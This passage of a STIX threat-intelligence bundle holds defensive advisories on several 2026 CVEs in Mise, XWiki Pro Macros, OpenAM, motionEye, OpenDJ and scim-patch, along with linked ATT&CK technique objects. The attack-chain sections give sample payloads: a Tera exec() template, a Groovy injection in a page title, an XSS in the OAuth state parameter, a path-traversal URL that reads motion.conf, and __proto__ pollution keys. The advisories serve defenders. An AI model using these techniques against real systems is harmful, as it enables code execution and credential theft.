      "description": "## Overview\n\nA critical vulnerability, tracked as CVE-2026-33646, affects Mise, a popular multi-tool version manager. This flaw allows for arbitrary code execution on user systems when processing `.tool-versions` files. Unlike `.mise.toml` files, `.tool-versions` are not subject to a trust verification mechanism in non-paranoid mode (which is the default). This means an attacker can embed malicious Tera template syntax, specifically using the `exec()` function, into a `.tool-versions` file within a Git repository. When a victim, with `mise` activated, changes directory (`cd`) into such a repository, the malicious commands execute silently and automatically, leveraging the full privileges and environment variables of the current user. The vulnerability affects Mise versions prior to 2026.3.10 and poses a significant supply chain risk to developers.\n\n## Attack Chain\n\n1. An attacker crafts a malicious `.tool-versions` file containing `Tera` template syntax with an `exec()` function call (e.g., `{{ exec(command=\"malicious_command\") }}`) and embeds it in a Git repository.\n2. The victim, who has `mise` activated in their shell (e.g., `eval \"$(mise activate zsh)\"`), clones or downloads this malicious Git repository.\n3. The victim navigates into the cloned repository's directory using a command like `cd`.\n4. Mise's shell hook (`hook-env`) automatically triggers, initiating the parsing of configuration files, including the malicious `.tool-versions` file.\n5. During parsing, the `ToolVersions::parse_str` function processes the `.tool-versions` file content through the `Tera` template engine without performing a trust check.\n6. The `Tera` engine evaluates the embedded `exec()` function, which in turn spawns a shell process to execute the attacker-defined arbitrary command (e.g., `curl` for exfiltration or `id` for reconnaissance).\n7. The malicious command executes silently as the victim's current user with their full environment, without any warning or user interaction.\n8. This allows the attacker to achieve arbitrary code execution, potentially leading to data exfiltration, further compromise, or system modification, as demonstrated by the PoC's `curl` or `id` commands.\n\n## Impact\n\nThe successful exploitation of CVE-2026-33646 leads to arbitrary code execution on the victim's machine. This presents a critical supply chain attack vector, as `.tool-versions` files are commonly committed to repositories and are expected to be benign. Execution occurs silently without any user prompt or warning, running with the full privileges and environment of the current user. This allows attackers to perform actions such as credential theft by exfiltrating environment variables (which may contain tokens, API keys, or SSH agent information) or establishing further persistence. The widespread use of `mise` in development environments means a broad range of open-source projects and developer machines are potentially vulnerable.\n\n## Recommendation\n\n* Patch CVE-2026-33646 by updating `mise` to version 2026.3.10 or newer immediately.\n* Deploy the provided Sigma rule to detect suspicious `curl` commands used for data exfiltration, often indicative of arbitrary code execution.\n* Enable `process_creation` logging for shell processes (`bash`, `zsh`, `powershell`, `cmd.exe`) to capture commands executed in user environments, especially in newly cloned or untrusted repositories.\n* Review and implement the recommended trust checks for `.tool-versions` files if patching is not immediately feasible.\n",
      "published": "2026-07-03T11:07:52Z",
      "labels": [
        "mise",
        "rce",
        "supply-chain",
        "trust-bypass",
        "code-execution",
        "developer-tools",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
        "attack-pattern--a2bbc1a7-f032-500e-86d9-c38716e236cb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-fjj5-v948-whjj"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--224af847-3a8c-5115-a308-bf6531c995c3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--931e30d1-7af5-5e2c-8e6c-7c1b525f7cf0",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--931e30d1-7af5-5e2c-8e6c-7c1b525f7cf0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "XWiki Pro Macros Remote Code Execution via Excerpt-Include Macro (CVE-2026-44179)",
      "description": "## Overview\n\nA critical vulnerability, tracked as CVE-2026-44179, affects XWiki Pro Macros versions 1.13 through 1.14.4. This flaw enables remote code execution (RCE) on affected XWiki installations. The vulnerability stems from the `excerpt-include` macro's failure to properly escape the title of an included page and its execution of excerpt content with elevated rights. This allows for XWiki syntax injection, where an attacker with basic page editing privileges can embed malicious Groovy code within a page's title or content. When this page is subsequently rendered or included by the `excerpt-include` macro, the embedded code is executed, providing the attacker with full control over the XWiki instance. This impacts the confidentiality, integrity, and availability of the entire XWiki system.\n\n## Attack Chain\n\n1.  An attacker gains or already possesses valid credentials to an XWiki instance with page editing permissions, even without specific script or programming rights.\n2.  The attacker creates a new XWiki page, for example, named \"Exploit\", using the standard page creation interface.\n3.  The attacker then edits the \"Exploit\" page and maliciously modifies its title to include an XWiki Groovy Remote Code Execution (RCE) payload, such as `{{async}}{{groovy}}println(\"Malicious Code\"){{/groovy}}{{/async}}`.\n4.  The attacker embeds the vulnerable `excerpt-include` macro within the content of the same \"Exploit\" page, configured to include itself (e.g., `{{excerpt-include 0=\"Exploit.WebHome\"}}{{/excerpt-include}}`).\n5.  Concurrently, the attacker injects another Groovy RCE payload directly into an `{{excerpt}}` block within the page's content, which will also be processed by the macro.\n6.  Upon saving or rendering the \"Exploit\" page, the XWiki engine processes the `excerpt-include` macro, which, due to improper escaping, executes the embedded Groovy code from the page's title and content.\n7.  The embedded Groovy code runs with the `excerpt-include` macro's rights, leading to successful Remote Code Execution on the underlying XWiki server.\n\n## Impact\n\nThe successful exploitation of CVE-2026-44179 leads to remote code execution on the XWiki server. This allows an attacker to execute arbitrary commands, compromise the integrity of the XWiki data, exfiltrate sensitive information, or disrupt the availability of the service. While no specific victim count is provided, the vulnerability affects all XWiki installations using the `xwiki-pro-macros` package within the vulnerable version range, posing a significant risk to any organization relying on XWiki for content management and collaboration.\n\n## Recommendation\n\n*   Prioritize patching XWiki Pro Macros to version 1.14.5 or later to remediate CVE-2026-44179 immediately.\n*   Review XWiki audit logs for any unusual page title modifications or new page creations containing suspicious syntax like `{{async}}{{groovy}}` or `println(`.\n*   Implement strong access controls for XWiki page editing, adhering to the principle of least privilege, even though this vulnerability bypasses typical script execution restrictions.\n",
      "published": "2026-07-03T11:06:27Z",
      "labels": [
        "xwiki",
        "rce",
        "vulnerability",
        "java",
        "web-application"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-w56x-9778-rppx"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2bade5b1-4638-598e-9619-9154226ac41a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4e6aef38-97fd-5986-98ec-66ed99f6615f",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b2c63a26-55df-5735-a52c-4a70623f7409",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4e6aef38-97fd-5986-98ec-66ed99f6615f",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4e6aef38-97fd-5986-98ec-66ed99f6615f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenAM Pre-Authentication Reflected XSS via OAuth2/OIDC state parameter (CVE-2026-44203)",
      "description": "## Overview\n\nOpenIdentityPlatform OpenAM, a popular access management solution, is affected by a critical pre-authentication reflected Cross-Site Scripting (XSS) vulnerability, identified as CVE-2026-44203. The vulnerability resides in the `openam-oauth2` component, specifically within the OAuth 2.0 / OpenID Connect authorization endpoint when utilizing the `form_post` response mode. Insufficient sanitization of user-supplied parameters, notably the `state` parameter, before their inclusion in the HTML response (generated by `FormPostResponse.ftl`) allows attackers to inject arbitrary client-side script. This flaw impacts OpenAM versions from 13.0.0 up to, but not including, 16.1.1. Defenders must prioritize patching to prevent attackers from exploiting this vulnerability to execute malicious code within the victim's browser in the context of the OpenAM origin, potentially leading to session compromise or credential theft.\n\n## Attack Chain\n\n1.  Attacker identifies a vulnerable OpenAM instance exposed to the internet.\n2.  Attacker crafts a malicious URL targeting the OpenAM OAuth2/OIDC authorization endpoint, embedding an XSS payload (e.g., `\u003cscript\u003ealert(document.domain)\u003c/script\u003e`) within the `state` parameter. The URL also specifies `response_mode=form_post`.\n3.  Attacker distributes this crafted URL to a potential victim, typically via a phishing email, malicious web link, or social engineering.\n4.  Victim clicks the malicious URL, sending a request to the vulnerable OpenAM server that includes the attacker-controlled `state` parameter.\n5.  OpenAM, processing the request for the `form_post` response mode, fails to adequately sanitize the `state` parameter due to CVE-2026-44203 and embeds the malicious script directly into the HTML response (`FormPostResponse.ftl`).\n6.  The victim's web browser receives the crafted HTML response and, treating it as legitimate content from the OpenAM domain, executes the embedded malicious JavaScript.\n7.  The executed XSS payload performs actions such as stealing the victim's session cookies, attempting to harvest credentials, or performing arbitrary actions on behalf of the user within the OpenAM application.\n8.  Attacker leverages the stolen information or actions to gain unauthorized access or control within the victim's OpenAM session.\n\n## Impact\n\nA successful exploitation of CVE-2026-44203 grants an attacker the ability to execute arbitrary client-side script within the victim's browser, operating under the security context of the OpenAM domain. This can lead to severe consequences including session hijacking, credential theft, defacement of the legitimate OpenAM interface, or redirection to malicious sites. The critical CVSS score of 9.3 underscores the potential for significant compromise due to the vulnerability being pre-authentication and having high impacts on confidentiality and integrity. Although specific victim counts are not available, all organizations running vulnerable OpenAM versions are at risk.\n\n## Recommendation\n\n*   Patch CVE-2026-44203 immediately by upgrading `maven/org.openidentityplatform.openam:openam-oauth2` to version 16.1.1 or higher.\n*   Deploy the `Detect CVE-2026-44203 Exploitation - OpenAM Reflected XSS` Sigma rule to your SIEM for early detection of exploitation attempts.\n*   Configure web server or WAF logging to capture full HTTP request details, especially `cs-uri-query` parameters, for all traffic directed at OpenAM endpoints.\n*   Monitor web server access logs for requests to `/oauth2/realms/*/authorize` containing `response_mode=form_post` and suspicious, script-like content in the `state` parameter as identified by the Sigma rule.\n",
      "published": "2026-07-03T11:05:31Z",
      "labels": [
        "xss",
        "web-vulnerability",
        "openam",
        "oidc",
        "oauth2"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-fq9h-c788-fx73"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/OpenIdentityPlatform/OpenAM/releases/tag/16.1.1"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d4be9644-10c4-599a-ad4f-b223ecb9d29c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c81cbdfa-c55d-5622-bd69-1514c39ac4f9",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "File and Directory Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1083",
          "url": "https://attack.mitre.org/techniques/T1083"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2dcedb9e-9aea-5ec3-a788-6d05ea0343f7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c81cbdfa-c55d-5622-bd69-1514c39ac4f9",
      "target_ref": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fccf8fd2-e4d2-5aec-86c5-730c5c7dbd60",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c81cbdfa-c55d-5622-bd69-1514c39ac4f9",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0151aee2-7c77-5ee9-ab4a-661996861410",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c81cbdfa-c55d-5622-bd69-1514c39ac4f9",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7a0db655-8b49-55d0-9f91-af938f0be1ac",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c81cbdfa-c55d-5622-bd69-1514c39ac4f9",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c81cbdfa-c55d-5622-bd69-1514c39ac4f9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "motionEye Partial Authentication Bypass: Unauthenticated Admin Credential Theft via Path Traversal",
      "description": "## Overview\n\nA critical vulnerability exists in motionEye versions prior to 0.44.0, enabling unauthenticated attackers to gain full administrative access and remote code execution. This is achieved by chaining two issues: a default configuration allowing unauthenticated access to normal-user endpoints when the normal user password is empty, and a path traversal vulnerability in several handlers (e.g., `MoviePlaybackHandler`). By exploiting the path traversal, an attacker can read the `motion.conf` file, which contains the admin password as a SHA-1 hash. This hash can then be used directly as a signing key to bypass authentication and gain full admin privileges without cracking. The scenario is realistic for home surveillance setups where the admin password protects settings, but camera feeds are left open for household members, making affected instances vulnerable to complete compromise.\n\n## Attack Chain\n\n1.  **Reconnaissance \u0026 Initial Access**: An attacker identifies a motionEye instance configured with an empty normal user password (default setting), allowing unauthenticated access to normal-level endpoints.\n2.  **Path Traversal Exploitation**: The attacker crafts and sends an unauthenticated HTTP GET request to a vulnerable handler, such as `/movie/1/playback//etc/motioneye/motion.conf`, leveraging the path traversal vulnerability.\n3.  **Information Disclosure**: The motionEye server's `MoviePlaybackHandler` (or similar) processes the malicious path, bypassing intended directory restrictions due to overridden safety checks, and reads the `motion.conf` file from the filesystem.\n4.  **Credential Theft**: The server's response contains the content of `motion.conf`, from which the attacker extracts the admin password's SHA-1 hash, stored as a comment line (e.g., `# @admin_password 7b7d...`).\n5.  **Authentication Bypass**: The attacker uses the stolen SHA-1 hash directly as a signing key by setting the `meye_password_hash` cookie, authenticating as an administrator to the motionEye web interface.\n6.  **Privilege Escalation \u0026 Remote Code Execution**: With full admin access, the attacker leverages the configuration API to inject arbitrary shell commands into motion event hooks (e.g., `command_notifications_exec`), which are then executed by the underlying `motion` daemon with the privileges of the motionEye process, achieving RCE.\n\n## Impact\n\nThis vulnerability leads to a severe privilege escalation from zero credentials to full admin access on any motionEye installation where the admin password is set but the normal user password is left empty (a common default configuration). Attackers can achieve arbitrary file read, potentially accessing sensitive files like `/etc/passwd` or SSH keys, if permissions allow. The most critical impact is full remote code execution, as administrative control allows injecting and executing arbitrary shell commands via motion event hooks. This represents a significant security risk for compromised surveillance systems, with public instances easily discoverable via search engines like Shodan.\n\n## Recommendation\n\n*   **Patch motionEye**: Immediately upgrade all motionEye installations to version 0.44.0 or higher to remediate the path traversal vulnerability.\n*   **Configure Passwords**: If possible, set a non-empty password for the normal user account to prevent unauthenticated access to normal-level endpoints, reducing the attack surface.\n*   **Deploy Detection Rule**: Deploy the provided Sigma rule to your SIEM to detect attempts at path traversal for configuration files.\n*   **Monitor Web Server Logs**: Actively monitor web server access logs for unusual GET requests containing absolute file paths, particularly those targeting sensitive configuration files or unexpected locations.\n",
      "published": "2026-07-03T10:49:21Z",
      "labels": [
        "path-traversal",
        "authentication-bypass",
        "remote-code-execution",
        "credential-theft",
        "web-application"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-phv5-334h-mxcw"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8691b39a-4b9c-5591-9ed3-62919b3d42d4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7dc9fcc9-dce3-5220-8a07-b7cceaebc214",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--be1414ce-95b8-5183-82fb-ad2ffd311cb5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7dc9fcc9-dce3-5220-8a07-b7cceaebc214",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7dc9fcc9-dce3-5220-8a07-b7cceaebc214",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenDJ Pre-Auth RCE via Java Deserialization in JMX RMI (CVE-2026-46495)",
      "description": "## Overview\n\nA critical pre-authentication remote code execution (RCE) vulnerability, identified as CVE-2026-46495, impacts OpenDJ Community Edition versions up to 5.1.0. This flaw stems from a deserialization of untrusted data (CWE-502) within OpenDJ's JMX RMI connector, which allows an unauthenticated remote attacker to deserialize arbitrary Java objects on the server. The vulnerability exists because the platform processes attacker-controlled bytes prior to any authentication. While the JMX Connection Handler is disabled by default, it is frequently enabled in production environments for monitoring purposes, significantly expanding the attack surface. Exploitation requires direct TCP reachability to the configured JMX listener and does not necessitate prior authentication, specific privileges, or client certificates. Successful exploitation can lead to complete system compromise, with the specific impact depending on the server's runtime classpath and Java version. This issue was patched in OpenDJ Community Edition version 5.1.1.\n\n## Attack Chain\n\n1.  An unauthenticated remote attacker identifies an internet-accessible OpenDJ server with the JMX Connection Handler enabled, listening for JMX RMI connections.\n2.  The attacker crafts a malicious serialized Java object payload designed to execute arbitrary commands upon deserialization.\n3.  The attacker establishes a connection to the OpenDJ JMX RMI listener.\n4.  The attacker transmits the crafted malicious serialized Java object payload over the JMX RMI connection.\n5.  The OpenDJ server, due to the deserialization of untrusted data vulnerability (CVE-2026-46495), processes and deserializes the attacker-controlled bytes before any authentication takes place.\n6.  During deserialization, the malicious Java object triggers arbitrary code execution on the underlying operating system within the context of the OpenDJ server process.\n7.  The attacker gains unauthenticated Remote Code Execution (RCE) on the server, potentially leading to full system compromise or data exfiltration.\n\n## Impact\n\nThis critical vulnerability impacts all OpenDJ Community Edition releases up to 5.1.0 where the JMX Connection Handler is enabled, a common practice for monitoring integrations. Successful exploitation requires TCP reachability to the JMX listener and grants unauthenticated Remote Code Execution (RCE), allowing attackers to run arbitrary code on the server. The severity of the RCE and potential for system compromise depends on the server's runtime classpath and Java version. For example, unauthenticated RCE was specifically demonstrated on OpenDJ 4.4.15 running JDK 11 with Jackson 2.12.6.1, indicating a high potential for severe consequences including data breach, system disruption, or further network lateral movement.\n\n## Recommendation\n\n*   Prioritize patching all affected OpenDJ Community Edition instances to version 5.1.1 or higher immediately to remediate CVE-2026-46495.\n*   Review network firewall rules to ensure that the OpenDJ JMX RMI connector port (default 1099, though configurable) is not exposed to untrusted networks or the internet unless absolutely necessary.\n*   Disable the JMX Connection Handler if it is not explicitly required for monitoring integrations, as it is disabled by default in OpenDJ.\n",
      "published": "2026-07-03T11:03:19Z",
      "labels": [
        "java",
        "deserialization",
        "rce",
        "opendj",
        "jmx-rmi",
        "pre-auth",
        "network"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-43x2-g84q-fmqx"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--65cb66d4-4901-58b5-a682-46ba78c047b5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0a7f5586-ecaa-56f4-a118-2ea796522ff4",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f060d783-60c0-51b2-864f-b4d71f55aa5a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0a7f5586-ecaa-56f4-a118-2ea796522ff4",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--05ba0738-87ff-591d-8935-e2518fc59ed2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0a7f5586-ecaa-56f4-a118-2ea796522ff4",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--0a7f5586-ecaa-56f4-a118-2ea796522ff4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "scimPatch vulnerable to prototype pollution via unfiltered keys in patch",
      "description": "## Overview\n\nThe `scim-patch` Node.js library, versions up to and including 0.9.0, is affected by a critical prototype pollution vulnerability, CVE-2026-48170. This flaw allows an unauthenticated or low-privileged attacker to achieve process-wide impact by sending a specially crafted SCIM PATCH request. The delivery mechanism involves a normal SCIM `PATCH /Users/:id` request body where the `value` object contains a key structured as `__proto__.someProp`. When the `scimPatch()` function processes this input, it inadvertently modifies `Object.prototype` in the Node.js runtime. This mutation affects every plain object within the running process, creating a persistent state until the process restarts. For defenders, this is critical because it can lead to severe consequences such as privilege escalation if authentication logic relies on checking properties of otherwise clean objects (e.g., `req.user.isAdmin`), or denial of service through logic bypasses, impacting the availability and integrity of services using `scim-patch`.\n\n## Attack Chain\n\n1.  Attacker crafts a malicious SCIM PATCH request targeting a vulnerable endpoint, for example, `PATCH /Users/:id`.\n2.  The request body contains a JSON array with an \"add\" or \"replace\" operation, where the `value` object includes a key structured as `__proto__.polluted` or `__proto__.isAdmin`.\n3.  The vulnerable Node.js application, using the `scim-patch` library, receives and processes this request via the `scimPatch()` function.\n4.  Inside `scimPatch()`, the `addOrReplaceObjectAttribute` function iterates over the user-supplied `patch.value` and feeds the dangerous key (`__proto__.polluted`) to `resolvePaths`.\n5.  The `assign` helper function then walks the `keyPath` which includes `__proto__`, and `obj` is reassigned to `Object.prototype` when `obj = obj[\"__proto__\"]` is executed.\n6.  Subsequently, the `value` from the malicious patch (e.g., `'yes'` or `true`) is assigned to `Object.prototype.polluted` or `Object.prototype.isAdmin`, effectively polluting the global `Object.prototype`.\n7.  This global prototype modification persists until the Node.js process is restarted, affecting all subsequent operations and new objects within that process.\n8.  This leads to impacts such as privilege escalation if downstream code checks for properties like `isAdmin` on affected objects, or denial of service through logic bypasses.\n\n## Impact\n\nThe impact of CVE-2026-48170 is process-wide, affecting any Node.js service utilizing the `scim-patch` library for SCIM operations. This could include identity management systems, user provisioning services, and enterprise applications that integrate with external Identity Providers (IdPs). If exploited, this prototype pollution can lead to severe consequences such as privilege escalation, enabling attackers to bypass authentication or authorization checks if affected code relies on checking properties of otherwise clean objects (e.g., `req.user.isAdmin`). It can also cause denial of service through logic bypasses if critical application logic branches on object properties, leading to unpredictable behavior or crashes. The modification to `Object.prototype` persists until the Node.js process is restarted, affecting every request handled by the compromised container after pollution, making detection and recovery challenging.\n\n## Recommendation\n\n*   Upgrade the `npm/scim-patch` library to a version beyond `0.9.0` (which includes the fix for CVE-2026-48170) immediately.\n*   Implement `Object.freeze(Object.prototype)` at the Node.js process startup to mitigate CVE-2026-48170, as described in the brief's \"Mitigation\" section.\n*   Utilize the Node.js `--frozen-intrinsics` flag during 